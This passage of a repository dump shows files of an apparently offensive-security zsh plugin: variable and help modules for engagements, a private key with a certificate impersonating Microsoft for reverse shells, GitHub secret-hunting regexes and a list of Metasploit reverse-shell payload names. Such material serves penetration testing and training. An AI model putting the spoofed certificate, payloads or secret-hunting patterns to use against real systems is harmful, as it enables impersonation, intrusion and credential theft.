\"php,phtml,pht,xml,inc,log,sql,cgi\")\n\nqq-vars-global-set-ext-php() {\n __ask \"Enter a csv list of PHP server file extensions, ex: php,php3,pht\"\n __askvar __EXT_PHP EXTENSIONS\n echo \"${__EXT_PHP}\" > ${__GLOBALS}/EXT_PHP\n}\n\n__check-ext-php() { [[ -z \"${__EXT_PHP}\" ]] && qq-vars-global-set-ext-php } \n\n########## __EXT_DOCS\n\nexport __EXT_DOCS=$(cat ${__GLOBALS}/EXT_DOC 2> /dev/null || echo \"doc,docx,pdf,xls,xlsx,txt,rtf,odt,ppt,pptx,pps,xml\")\n\nqq-vars-global-set-ext-docs() {\n __ask \"Enter a csv list of document file extensions, ex: doc,xls,ppt\"\n __askvar __EXT_DOCS EXTENSIONS\n echo \"${__EXT_DOCS}\" > ${__GLOBALS}/EXT_DOCS\n}\n\n__check-ext-docs() { [[ -z \"${__EXT_DOCS}\" ]] && qq-vars-global-set-ext-docs } \n\n########## __API_GITHUB\n\nexport __API_GITHUB=\"$(cat ${__GLOBALS}/API_GITHUB 2> /dev/null)\"\n\nqq-vars-global-set-api-github() {\n __ask \"Enter your github API key below.\"\n __askvar __API_GITHUB API_GITHUB\n echo \"${__API_GITHUB}\" > ${__GLOBALS}/API_GITHUB\n}\n\n__check-api-github() { [[ -z \"${__API_GITHUB}\" ]] && qq-vars-global-set-api-github } \n\n########## __API_GOOGLE_DOMAINS\n\nexport __API_GOOGLE_DOMAINS=\"$(cat ${__GLOBALS}/API_GOOGLE_DOMAINS 2> /dev/null)\"\n\nqq-vars-global-set-api-google-domains() {\n __ask \"Enter Google domains username and password for a dynamic DNS domain\"\n local u && __askvar u USERNAME \n local p && __askvar p PASSWORD\n local __API_GOOGLE_DOMAINS = $( echo \"$u:$p\" | base64 )\n echo \"${__API_GOOGLE_DOMAINS}\" > ${__GLOBALS}/API_GOOGLE_DOMAINS\n}\n\n__check-api-github() { [[ -z \"${__API_GITHUB}\" ]] && qq-vars-global-set-api-github } \n\n\n########## __RESOLVERS\n\nexport __RESOLVERS=$(cat ${__GLOBALS}/RESOLVERS 2> /dev/null || echo \"${__PAYLOADS}/resolvers.txt\")\n\nqq-vars-global-set-resolvers() {\n __ask \"Set the full path to the file containing a list of resolvers.\"\n __askpath __RESOLVERS FILE $HOME\n echo \"${__RESOLVERS}\" > ${__GLOBALS}/RESOLVERS\n}\n\n__check-resolvers() { [[ -z \"${__RESOLVERS}\" ]] && qq-vars-global-set-resolvers }\n\n\n########## __NOTES\n\nexport __NOTES=\"$(cat ${__GLOBALS}/NOTES 2> /dev/null)\"\n\nqq-vars-global-set-notes() {\n __ask \"Set the full path to the directory containing markdown notes.\"\n __askpath __NOTES DIR $HOME\n echo \"${__NOTES}\" > ${__GLOBALS}/NOTES\n}\n\n__check-notes() { [[ -z \"${__NOTES}\" ]] && qq-vars-global-set-notes }\n\n########## __MNU_UA\n\nexport __MNU_UA=\"$(cat ${__GLOBALS}/MNU_UA 2> /dev/null || echo \"${__PAYLOADS}/user-agents.txt\")\"\n\nqq-vars-global-set-mnu-ua() {\n __ask \"Set the full path to the file containing a list of user agent strings\"\n __askpath __MNU_UA FILE $HOME\n echo \"${__MNU_UA}\" > ${__GLOBALS}/MNU_UA\n}\n\n########## __MNU_WORDLISTS\n\nexport __MNU_WORDLISTS=\"$(cat ${__GLOBALS}/MNU_WORDLISTS 2> /dev/null || echo \"${__PAYLOADS}/wordlists.txt\")\"\n\nqq-vars-global-set-mnu-wordlists() {\n __ask \"Set the full path to the file containing a list of favorite wordlists\"\n __askpath __MNU_WORDLISTS FILE $HOME\n echo \"${__MNU_WORDLISTS}\" > ${__GLOBALS}/MNU_WORDLISTS\n}\n\n########## __TCP_PORTS\n\nexport __TCP_PORTS=\"$(cat ${__GLOBALS}/TCP_PORTS 2> /dev/null || echo \"${__PAYLOADS}/tcp-ports.txt\")\"\n\nqq-vars-global-set-tcp-ports() {\n __ask \"Set the full path to the file containing a list of favorite TCP ports\"\n __askpath __TCP_PORTS FILE $HOME\n echo \"${__TCP_PORTS}\" > ${__GLOBALS}/TCP_PORTS\n}\n\n########## __SHELL_SSL_CERT\n\nexport __SHELL_SSL_CERT=\"$(cat ${__GLOBALS}/SHELL_SSL_CERT 2> /dev/null || echo \"${__PAYLOADS}/aka.ms.pem\")\"\n\nqq-vars-global-set-shell-ssl-cert() {\n __ask \"Set the full path to an impersonated SSL certificate in PEM format to use with reverse shells\"\n __askpath __SHELL_SSL_CERT FILE $HOME\n echo \"${__SHELL_SSL_CERT}\" > ${__GLOBALS}/SHELL_SSL_CERT\n}\n\n########## __ALIASES\n\nexport __ALIASES=\"$(cat ${__GLOBALS}/ALIASES 2> /dev/null || echo \"${__PAYLOADS}/aliases.rc\")\"\n\nqq-vars-global-set-aliases() {\n __ask \"Set the full path to a file containing shell aliases\"\n __askpath __ALIASES FILE $HOME\n echo \"${__ALIASES}\" > ${__GLOBALS}/ALIASES\n}\n" }, { "path": "modules/qq-vars.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-vars\n#############################################################\n\nqq-vars-help() {\n cat << \"DOC\"\n\nqq-vars\n-------\nThe vars namespace manages environment variables used in other functions. These\nvariables are set per session, but can be saved with qq-vars-save and reloaded\nwith qq-vars-load. The values are stored as files in .quiver/vars.\n\nThe menu options for some of the variables can be set using qq-vars-global, such\nas the list of favorite user-agents or wordlists (qq-vars-global-help).\n\nVariables\n---------\n__PROJECT: the root directory used for all output, ex: /projects/example\n__LOGBOOK: the logbook.md markdown file used in qq-log commands \n__IFACE: the interface to use for commands, ex: eth0\n__DOMAIN: the domain to use for commands, ex: example.org\n__NETWORK: the subnet to use for commands, ex: 10.1.2.0/24\n__RHOST: the remote host or target, ex: 10.1.2.3, example: target.example.org\n__RPORT: the remote port; ex: 80\n__LHOST: the accessible local IP address, ex: 10.1.2.3\n__LPORT: the accessible local PORT, ex: 4444\n__URL: a target URL, example: https://target.example.org\n__UA: the user agent to use for commands, ex: googlebot\n__WORDLIST: path to a wordlist file, ex: /usr/share/wordlists/example.txt\n__PASSLIST: path to a wordlist for password brute forcing, ex: /usr/share/wordlists/rockyou.txt\n\nCommands\n--------\nqq-vars: alias qv, list all current variable values\nqq-vars-save: alias qvs, save all current variable values ($HOME/.quiver)\nqq-vars-load: alias qvl, restores all current variable values ($HOME/.quiver)\nqq-vars-clear: clears all current variable values\nqq-vars-set-*: used to set each individual variable\n\nDOC\n}\n\nqq-vars() {\n echo \"$(__cyan __PROJECT: ) ${__PROJECT}\"\n echo \"$(__cyan __LOGBOOK: ) ${__LOGBOOK}\"\n echo \"$(__cyan __IFACE: ) ${__IFACE}\"\n echo \"$(__cyan __DOMAIN: ) ${__DOMAIN}\"\n echo \"$(__cyan __NETWORK: ) ${__NETWORK}\"\n echo \"$(__cyan __RHOST: ) ${__RHOST}\"\n echo \"$(__cyan __RPORT: ) ${__RPORT}\"\n echo \"$(__cyan __LHOST: ) ${__LHOST}\"\n echo \"$(__cyan __LPORT: ) ${__LPORT}\"\n echo \"$(__cyan __URL: ) ${__URL}\"\n echo \"$(__cyan __UA: ) ${__UA}\"\n echo \"$(__cyan __WORDLIST: ) ${__WORDLIST}\"\n echo \"$(__cyan __PASSLIST: ) ${__PASSLIST}\"\n}\nalias qv=\"qq-vars\"\n\nqq-vars-clear() {\n __PROJECT=\"\"\n __LOGBOOK=\"\"\n __IFACE=\"\"\n __DOMAIN=\"\"\n __NETWORK=\"\"\n __RHOST=\"\"\n __RPORT=\"\"\n __LHOST=\"\"\n __LPORT=\"\"\n __URL=\"\"\n __UA=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\"\n __WORDLIST=\"\"\n __PASSLIST=\"\"\n}\n\nqq-vars-save() {\n echo \"${__PROJECT}\" > $__VARS/PROJECT\n echo \"${__LOGBOOK}\" > $__VARS/LOGBOOK\n echo \"${__IFACE}\" > $__VARS/IFACE\n echo \"${__DOMAIN}\" > $__VARS/DOMAIN\n echo \"${__NETWORK}\" > $__VARS/NETWORK\n echo \"${__RHOST}\" > $__VARS/RHOST\n echo \"${__RPORT}\" > $__VARS/RPORT\n echo \"${__LHOST}\" > $__VARS/LHOST\n echo \"${__LPORT}\" > $__VARS/LPORT\n echo \"${__URL}\" > $__VARS/URL\n echo \"${__UA}\" > $__VARS/UA\n echo \"${__WORDLIST}\" > $__VARS/WORDLIST\n echo \"${__PASSLIST}\" > $__VARS/PASSLIST\n qq-vars\n}\nalias qvs=\"qq-vars-save\"\n\nqq-vars-load() {\n __PROJECT=$(cat $__VARS/PROJECT) \n __LOGBOOK=$(cat $__VARS/LOGBOOK)\n __IFACE=$(cat $__VARS/IFACE)\n __DOMAIN=$(cat $__VARS/DOMAIN)\n __NETWORK=$(cat $__VARS/NETWORK)\n __RHOST=$(cat $__VARS/RHOST)\n __RPORT=$(cat $__VARS/RPORT)\n __LHOST=$(cat $__VARS/LHOST)\n __LPORT=$(cat $__VARS/LPORT)\n __URL=$(cat $__VARS/URL)\n __UA=$(cat $__VARS/UA)\n __WORDLIST=$(cat $__VARS/WORDLIST)\n __PASSLIST=$(cat $__VARS/PASSLIST)\n qq-vars\n}\nalias qvl=\"qq-vars-load\"\n\n\n########## __PROJECT\n\nexport __PROJECT=\"\"\n\nqq-vars-set-project() {\n __ask \"Set the full path to the project root directory where all command output will be directed\"\n \n local d && __askpath d \"PROJECT DIR\" ${__PROJECT}\n [[ \"$d\" == \"~\"* ]] && __err \"~ not allowed, use the full path\" && return\n\n __PROJECT=$d\n mkdir -p ${__PROJECT}\n \n}\n\n__check-project() { [[ -z \"${__PROJECT}\" ]] && qq-vars-set-project }\n\n########## __LOGBOOK\n\nexport __LOGBOOK=\"\"\n\nqq-vars-set-logbook() {\n __ask \"Set the full path to the directory of the logbook file (filename not included).\"\n \n local d=$(__askpath DIR $HOME)\n [[ \"$d\" == \"~\"* ]] && __err \"~ not allowed, use the full path\" && return\n\n mkdir -p $d\n\n __LOGBOOK=\"${d}/logbook.md\"\n \n if [[ -f \"${__LOGBOOK}\" ]]; then\n __warn \"${__LOGBOOK} already exists, set as active log\"\n else\n touch ${__LOGBOOK}\n echo \"# Logbook\" >> ${__LOGBOOK}\n echo \" \" >> ${__LOGBOOK}\n __ok \"${__LOGBOOK} created.\"\n fi\n}\n\n__check-logbook() { [[ -z \"${__LOGBOOK}\" ]] && qq-vars-set-logbook }\n\n########## __IFACE\n\nexport __IFACE=\"\"\n\nqq-vars-set-iface() {\n if [[ -z \"${__IFACE}\" ]]\n then\n __ask \"Choose an interface: \"\n __IFACE=$(__menu $(ip addr list | awk -F': ' '/^[0-9]/ {print $2}')) \n else\n __prefill __IFACE IFACE ${__IFACE}\n fi\n\n}\n\n__check-iface() { [[ -z \"${__IFACE}\" ]] && qq-vars-set-iface }\n\n########## __DOMAIN\n\nexport __DOMAIN=\"\"\n\nqq-vars-set-domain() { __prefill __DOMAIN DOMAIN ${__DOMAIN} }\n\n__check-domain() { [[ -z \"${__DOMAIN}\" ]] && qq-vars-set-domain }\n\n\n########## __NETWORK\n\nexport __NETWORK=\"\"\n\nqq-vars-set-network() { __prefill __NETWORK NETWORK ${__NETWORK} }\n\n__check-network() { [[ -z \"${__NETWORK}\" ]] && qq-vars-set-network }\n\n########## __RHOST\n\nexport __RHOST=\"\"\n\nqq-vars-set-rhost() { __prefill __RHOST RHOST ${__RHOST} }\n\n########## __RPORT\n\nexport __RPORT=\"\"\n\nqq-vars-set-rport() { __prefill __RPORT RPORT ${__RPORT} }\n\n########## __LHOST\n\nexport __LHOST=\"\"\n\nqq-vars-set-lhost() {\n if [[ -z $__LHOST ]]\n then\n __ask \"Choose a local IP address: \" \n __LHOST=$(__menu $(ip addr list | grep -e \"inet \" | cut -d' ' -f6 | cut -d'/' -f1))\n else\n __prefill __LHOST LHOST ${__LHOST}\n fi\n}\n\n########## __LPORT\n\nexport __LPORT=\"\"\n\nqq-vars-set-lport() { __prefill __LPORT LPORT ${__LPORT} }\n\n\n########## __URL\n\nexport __URL=\"\"\n\nqq-vars-set-url() { \n local u && __prefill u URL ${__URL}\n __URL=$(echo ${u} | sed 's/\\/$//')\n}\n\n########## __UA\n\nexport __UA=\"Mozilla/5.0\"\n\nqq-vars-set-ua() {\n IFS=$'\\n'\n __ask \"Choose a user agent: \" \n __UA=$(__menu $(cat ${__MNU_UA}))\n}\n\n__check-ua() { [[ -z \"${__UA}\" ]] && qq-vars-set-ua }\n\n########## __WORDLIST\n\nexport __WORDLIST=\"\"\n\nqq-vars-set-wordlist() {\n if [[ -z $__WORDLIST ]]\n then\n __ask \"Choose a wordlist: \"\n __WORDLIST=$(__menu $(cat ${__MNU_WORDLISTS}))\n else\n\n __WORDLIST= __prefill __WORDLIST WORDLIST ${__WORDLIST}\n fi\n}\n\nqq-vars-set-wordlist-web() {\n __ask \"Choose a wordlist: \"\n __WORDLIST=$(__menu $(find /usr/share/seclists/Discovery/Web-Content | sort))\n}\n\nqq-vars-set-wordlist-dns() {\n __ask \"Choose a wordlist: \"\n __WORDLIST=$(__menu $(find /usr/share/seclists/Discovery/DNS | sort))\n}\n\n########## __PASSLIST\n\nexport __PASSLIST=\"/usr/share/wordlists/rockyou.txt\"\n\nqq-vars-set-passlist() {\n __ask \"Choose a passlist: \"\n __PASSLIST=$(__menu $(find /usr/share/seclists/Passwords | sort))\n}\n\n\n# helpers\n\nexport __THREADS\n__check-threads() { __askvar __THREADS THREADS }\n\nexport __USER\n__check-user() { __askvar __USER USER }\n\nexport __SHARE\n__check-share() { __askvar __SHARE SHARE }\n\nexport __ORG\n__check-org() { __askvar __ORG ORG }\n\nexport __ASN\n__check-asn() { __askvar __ASN ASN }\n\n\n__netpath() { \n __check-project\n local net=$(echo ${__NETWORK} | cut -d'/' -f1)\n local result=${__PROJECT}/networks/${net}\n mkdir -p \"${result}\"\n echo \"${result}\"\n}\n\n__hostpath() { \n __check-project\n local result=${__PROJECT}/hosts/${__RHOST}\n mkdir -p \"${result}\"\n echo \"${result}\"\n}\n\n__urlpath() { \n __check-project\n local host=$(echo ${__URL} | cut -d'/' -f3)\n local result=${__PROJECT}/hosts/${host}\n mkdir -p \"${result}\"\n echo \"${result}\"\n}\n\n__dompath() { \n __check-project\n local result=${__PROJECT}/domains/${__DOMAIN}\n mkdir -p \"${result}\"\n echo \"${result}\"\n}\n\n" }, { "path": "modules/qq.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq\n#############################################################\n\nqq-help() {\n cat << \"DOC\"\n\nqq\n--\nThe qq namespace is the root of all other namespaces that can be access with tab-completion.\nTo get started, explore the qq--help commands. Install dependencies per namespace,\nusing the qq--install commands or install all dependencies using qq-install-all.\n\nVariables\n---------\n__VERSION Current version of the Quiver plugin\n__PLUGIN Full path to the Quiver oh-my-zsh plugin directory\n\nCommands\n--------\nqq-update: git pull the latest (MASTER branch) version of Quiver\nqq-status: check the current status of the locally cloned Quiver repository\nqq-whatsnew: display the latest release notes\nqq-debug: display the local diagnostic log\n\nNamespaces\n----------\nQuiver is organized in a tree of namespaces that are accessible via \"qq-\" with tab completion and search.\nEach namespace has its own install and help commands.\n\n Install and Configuration\n -------------------------\n qq-install- Installers for commonly used applications and global installer for all dependencies\n qq-notes- Configure and read your markdown notes\n qq-vars-global- Persistent environment variables used in all commands, all sessions\n\n Utility\n ---------\n qq-encoding- Used for encoding / decoding data\n qq-kali- Variety of commands for managing Kali linux\n\n Engagement / Project / Bounty\n -----------------------------\n qq-log- Configure and setup a logbook for current engagement\n qq-vars- Per-session, per-engagement variables used in all commands\n qq-project- Commands to define scope and manage project data\n qq-project-custom- Commands for custom project directory scaffolding\n\n Recon Phase\n -----------\n qq-recon-org- Recon commands for organization files and data\n qq-recon-github- Recon commands for searching github repositories\n qq-recon-networks- Recon commands for identiying an organization's networks\n qq-recon-domains- Recon commands for horizontal domain enumeration\n qq-recon-subs- Recon commands for vertical sub-domain enumeration \n\n Active Enumeration Phase\n ------------------------\n qq-enum-network- Enumerate and scan networks\n qq-enum-host- Enumerate and scan an individual host\n qq-enum-dhcp- Enumerate DHCP services\n qq-enum-dns- Enumerate DNS services\n qq-enum-ftp- Enumerate FTP services\n qq-enum-kerb- Enumerate Kerberos services\n qq-enum-ldap- Enumerate LDAP and Active Directory services\n qq-enum-mssql- Enumerate MSSQL database services\n qq-enum-mysql- Enumerate MYSQL database services\n qq-enum-nfs- Enumerate NFS shares and services\n qq-enum-oracle- Enumerate Oracle database services\n qq-enum-pop3- Enumerate POP3 services\n qq-enum-rdp- Enumerate RDP services\n qq-enum-smb- Enumerate SMB services\n qq-enum-web- Enumerate web servers and services\n qq-enum-web-aws- Enumerate AWS hosted services\n qq-enum-web-dirs- Enumerate directories and files\n qq-enum-web-elastic- Enumerate elastic search services\n qq-enum-web-fuzz- Fuzz inputs such as forms, cookies and headers\n qq-enum-web-js- Mine javascript files for secrets\n qq-enum-web-php- Enumerate php web servers\n qq-enum-web-ssl- Enumerate SSL certs and services\n qq-enum-web-vuln- Check for common web vulnerabilities\n qq-enum-web-xss- XSS helpers\n\n Exploitation Phase\n ------------------\n qq-srv- Commands for spawning file hosting services\n qq-exploit- Commands for compiling exploits\n qq-shell-tty- Commands for upgrading shells to tty\n qq-shell-handlers- Commands for spawning reverse shell handlers\n qq-shell-handlers-msf- Commands for spawning reverse shells with Metasploit\n \n Post-Exploitation Phase\n -----------------------\n qq-pivot- Commands for pivoting with ssh\n\nDOC\n}\n\nqq-update() {\n cd $HOME/.oh-my-zsh/custom/plugins/quiver\n git pull\n rm $__REMOTE_VER\n rm $__REMOTE_CHK\n cd - > /dev/null\n source $HOME/.zshrc\n}\n\nqq-status() {\n cd $HOME/.oh-my-zsh/custom/plugins/quiver\n git status | grep On | cut -d\" \" -f2,3\n cd - > /dev/null\n}\n\nqq-whatsnew() {\n cat $__PLUGIN/RELEASES.md\n}\n\nqq-debug() {\n cat ${__LOGFILE}\n}\n\n##### Output Helpers\n\n__cyan() echo \"$fg[cyan]$@ $reset_color\"\n__green() echo \"$fg[green]$@ $reset_color\"\n__blue() echo \"$fg[blue]$@ $reset_color\"\n__yellow() echo \"$fg[yellow]$@ $reset_color\"\n__err() echo \"$fg[red]$@ $reset_color\"\n\n__info() __blue \"[*] $@\"\n__ok() __green \"[+] $@\"\n__warn() __yellow \"[!] $@\"\n__err() __red \"[X] $@\"\n\n##### Input Helpers\n\n__ask() __yellow \"$@\"\n__prompt() __cyan \"[?] $@\"\n\n__askvar() { \n local retval=$1\n local question=$2\n local tmpval\n read \"tmpval?$fg[cyan]${question}:$reset_color \"\n eval $retval=\"'$tmpval'\"\n}\n\n__askpath() { \n local retval=$1\n local question=$2\n local prefill=$3\n local tmpinput=$(rlwrap -S \"$fg[cyan]${question}: $reset_color\" -P \"${prefill}\" -e '' -c -o cat)\n local tmpval=$(echo \"${tmpinput}\" | sed 's/\\/$//' )\n eval $retval=\"'$tmpval'\"\n}\n\n__prefill() { \n local retval=$1\n local question=$2\n local prefill=$3\n local tmpval=$(rlwrap -S \"$fg[cyan]${question}: $reset_color\" -P \"${prefill}\" -e '' -o cat)\n eval $retval=\"'$tmpval'\"\n}\n\n__check-proceed() {\n PS3=\"$fg[cyan]Select: $reset_color\"\n COLUMNS=10\n select yn in \"Yes\" \"Cancel\"; do\n case $yn in\n Yes) \n return 0\n break;;\n *)\n return 1\n break;;\n esac\n done\n}\n\n__menu() {\n PS3=\"$fg[cyan]Select: $reset_color\"\n COLUMNS=10\n select o in $@; do break; done\n echo ${o}\n}\n\n##### String Helpers\n\n__trim-slash() { echo $1 | sed 's/\\/$//' }\n__trim-quotes() { echo $1 | tr -d \\\" }\n__trim-newline() { echo $1 | tr -d \"\\n\"}\n\n__rand() {\n if [ \"$#\" -eq \"1\" ]\n then\n head /dev/urandom | tr -dc A-Za-z0-9 | head -c $1 ; echo ''\n else\n head /dev/urandom | tr -dc A-Za-z0-9 | head -c 16 ; echo ''\n fi \n}\n\n##### Tool Helpers\n\n__msf() {\n local msfcmd=$(cat $@)\n print -z \"msfconsole -n -q -x \\\"${msfcmd}\\\" \"\n}" }, { "path": "payloads/aka.ms.pem", "content": "-----BEGIN RSA PRIVATE KEY-----\nMIICXAIBAAKBgQC2E+hNdtXUWpcB4qJz+afQmZNUB7V6gFViEejmU9SXuOirAVLl\nQ1cz2xwkyCb+xyGpEC51O4Hxb9bXEyV9JtJFjAlbehEkj+jFRIqEAXEd1UliFuRa\ngx4rwv0SpQWr3zu/jS5m+JdKnxdNISMFUR2G9bf8wcnNqhbtr6ByFyjsPQIDAQAB\nAoGBAIXWGkKeoEzojelf2sPe9kC6MnZo+Dfkj154BbcQVct0qunQHkvRdQ7z9zr+\nONO8MfzgnRWlOT3sVIJhW4Qj/hjNkIVpoGzRIpcGoW3L0XunJ1q6VaS+ESQUx0pY\njuyNmRYRaxSYrRzPolDqhX11fNM1Cswm5rrb2msvBBf7q/yNAkEA2Ub6za/tScaQ\n+xiLnmGwHSH9w0mKIm/XAuDFm1kOuId9xKOiwK5/7gLuan+rxSxc0FhoMYsB7nsN\nzgzJywasMwJBANaG/eXdNZYdfAGCkcpCmgUxiYx6/gRy3VX+uhMvaqBihBoGChiJ\nNVUs6ybyIJbh52fphPvfv2f6aIW5myFOlc8CQDTdymSFq8zJnbkazc3povpTrPT5\nTbz3TW+L1UjpMGXBwd44mn8bdlEpMW2ERv0gwCyJdkCnu/6UvlUmU2ss4nUCQAnn\nvb1pU1oVDm67aqPeI2JuAR3dZ/EopJOd6VWNcOzq35KcCMdNPosqQclQkLSmxZqE\nq8E9eYcBhuX1xfXpvP0CQBYNy279VufEzjkyjtv7Gc+6LjNoEcYOXQjffMN0gpwN\n+uc9FlSagHHs9hKLQk/4vIEeTqz008pwtF0XLy1dtdU=\n-----END RSA PRIVATE KEY-----\n-----BEGIN CERTIFICATE-----\nMIICyDCCAjGgAwIBAgIUAcIAbh51mEfqQLiFtggAAABuHn8wDQYJKoZIhvcNAQEL\nBQAwgYcxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJXQTEQMA4GA1UEBxMHUmVkbW9u\nZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQLExVNaWNy\nb3NvZnQgQ29ycG9yYXRpb24xGTAXBgNVBAMTEGdvLm1pY3Jvc29mdC5jb20wHhcN\nMTkwOTA2MTkzNzIxWhcNMjEwOTA2MTkzNzIxWjCBhzELMAkGA1UEBhMCVVMxCzAJ\nBgNVBAgTAldBMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQg\nQ29ycG9yYXRpb24xHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEZMBcG\nA1UEAxMQZ28ubWljcm9zb2Z0LmNvbTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkC\ngYEAthPoTXbV1FqXAeKic/mn0JmTVAe1eoBVYhHo5lPUl7joqwFS5UNXM9scJMgm\n/schqRAudTuB8W/W1xMlfSbSRYwJW3oRJI/oxUSKhAFxHdVJYhbkWoMeK8L9EqUF\nq987v40uZviXSp8XTSEjBVEdhvW3/MHJzaoW7a+gchco7D0CAwEAAaMvMC0wDAYD\nVR0TAQH/BAIwADAdBgNVHQ4EFgQUg2JaOA9UjImKCHybc5Bqu8YS40cwDQYJKoZI\nhvcNAQELBQADgYEAHkTVXl44F+tN0WWn3rbIUosimlbSYd6S9yLfCPGhpBdCv8GF\n3jfFULoiFv/L79KuNfZ/RElR+xtqnukrg3C9NYCC3mRymZRMnjnoFjDG//AoeLsU\n4802Opg2opg+OG23YFvz01rmdiHtUFM/0S1V4p3oiCDkwdz24E6/60OQu0A=\n-----END CERTIFICATE-----\n" }, { "path": "payloads/aliases.rc", "content": "\n#nav\nalias cd..=\"cd ../\"\nalias cls=\"clear\"\nalias path=\"echo -e \\${PATH//:/\\\\n}\"\nalias cp=\"cp -iv\"\nalias mv=\"mv -iv\"\nalias lf=\"ls -l | egrep -v '^d'\"\nalias ldir='ls -d */'\n\n#sys\nalias mounted=\"sudo mount | column -t\"\nalias df=\"df -mTh --total\"\nalias free=\"free -th\"\nalias ps=\"ps auxf\"\nalias psg=\"ps aux | grep -v grep | grep -i -e VSZ -e \"\n\n#network\nalias pcap=\"sudo tcpdump -r\"\nalias myip=\"curl icanhazip.com\"\nalias grip=\"grep -o '[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}'\"\n\n#proton vpn\nalias pv-check=\"sudo pip3 install protonvpn-cli --upgrade\"\nalias pvt=\"sudo protonvpn c -f\"\nalias pvu=\"sudo protonvpn c -f -p udp\"\nalias pvd=\"sudo protonvpn disconnect\"\nalias pvs=\"sudo protonvpn status\"\n\n#zsh\nalias zprc=\"cat ~/.zshrc\"\nalias zerc=\"nano ~/.zshrc\"\nalias zsrc=\"source ~/.zshrc\"\n\n# files and directory\nalias linestocsv=\"paste -s -d, -\"\nalias csvtolines=\"tr ',' '\\n'\"\nalias sfu=\"sort -u \"\nalias sfip=\"sort -u | sort -V \"\nalias sfuc=\"sort | uniq -c | sort -n\"\nalias dos2unix=\"tr -d '\\015' \"\nalias unix2dos=\"sed -e 's/$/\\r/'\"\n\n# out\n\nalias trim1=\"sed 's/.$//'\"\nalias trim2=\"sed 's/..$//'\"\nalias trim3=\"sed 's/...$//'\"\nalias trim4=\"sed 's/....$//'\"\n\n# tools\nalias hp=\"httprobe -t 3000 -c 50 \"\n" }, { "path": "payloads/github-dorks-commits.txt", "content": " \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n\n\n “Internal subdomain”: re.compile(‘([a-z0-9]+[.]*supersecretinternal[.]com)’),\n “Slack Token”: re.compile(‘(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})’),\n “RSA private key”: re.compile(‘—–BEGIN RSA PRIVATE KEY—–‘),\n “Facebook Oauth”: re.compile(‘[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\’|”][0-9a-f]{32}[\\’|”]’),\n “Twitter Oauth”: re.compile(‘[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\’|”][0-9a-zA-Z]{35,44}[\\’|”]’),\n “Google Oauth”: re.compile(‘(“client_secret”:”[a-zA-Z0-9-_]{24}”)’),\n “AWS API Key”: re.compile(‘AKIA[0-9A-Z]{16}’),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}’),\n “Heroku API Key”: re.compile(‘[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}’),\n “Generic Secret”: re.compile(‘[s|S][e|E][c|C][r|R][e|E][t|T].*[\\’|”][0-9a-zA-Z]{32,45}[\\’|”]’)" }, { "path": "payloads/msf-windows-payloads.txt", "content": "windows/x64/meterpreter/reverse_http\nwindows/x64/meterpreter/reverse_https\nwindows/x64/meterpreter/reverse_named_pipe\nwindows/x64/meterpreter/reverse_tcp\nwindows/x64/meterpreter/reverse_winhttp\nwindows/x64/meterpreter/reverse_winhttps\nwindows/x64/shell/reverse_tcp\nwindows/x64/shell/reverse_tcp_rc4\nwindows/x64/shell/reverse_tcp_uuid\nwindows/x64/shell_bind_tcp\nwindows/x64/shell_reverse_tcp" }, { "path": 